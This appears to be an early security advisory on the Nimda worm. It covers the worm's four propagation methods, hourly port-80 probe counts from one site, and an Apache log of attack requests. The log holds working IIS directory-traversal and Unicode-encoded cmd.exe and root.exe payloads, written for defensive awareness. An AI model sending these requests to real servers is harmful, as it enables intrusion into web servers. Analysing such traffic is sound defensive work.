New IIS "Concept Virus" Worm: NIMDA Propagating Quickly ---------------------------------------------------- UPDATE SUMMARY: A new worm that has been named "Nimda" is propagating with unprecedented speed across the Internet. The worm appears to have at least four distinct propagation mechanisms. ****INFORMATION IS PRELIMINARY**** (1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server. (2) The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. Note that the worm may spoof the source address on the emails, some have even been received at incidents.org with source addresses of codered@sans.org and webmaster@incidents.org. Other reports indicate that the spoofed source address of staff@attrition.org has also been seen. It is possible that someone is spoofing these emails intentionally, so that people will trust the source addresses as they are security sites. (3) When a web server is infected, the worm downloads a binary encoded as a wav file to each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer will automatically execute the malicious file. (4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password. The worm appears to prefer to target its neighbors, Code Red II style, when scanning for vulnerable IIS servers. This can cause considerable activity on local networks that have several infected machines. One classB site has reported their hourly port 80 probe statistics to us, which are included below. Note how fast the numbers are climbing. Hour # Bogus Port 80 # Unique Src EDT Probes Addresses ---- --------------- ------------ 00 53773 7152 01 54242 7221 02 52284 7329 03 59353 7314 04 140291 7492 05 100716 7492 06 53492 7263 07 54392 7227 08 54800 7433 09 113276 24396 10 330131 44576 11 369874 45368 12 399321 44430 ------------------------------------------------------- Many people are reporting this morning that a flood of IIS attacks are hitting their webservers. An short example trace, captured by an Apache server log, is below: "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-""-" "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-""-" "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" "GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" Evidently, a new worm is the source of the activity. Once the worm gains access to a vulnerable IIS webserver, it uses tftp to fetch a binary called Admin.dll from the infecting host.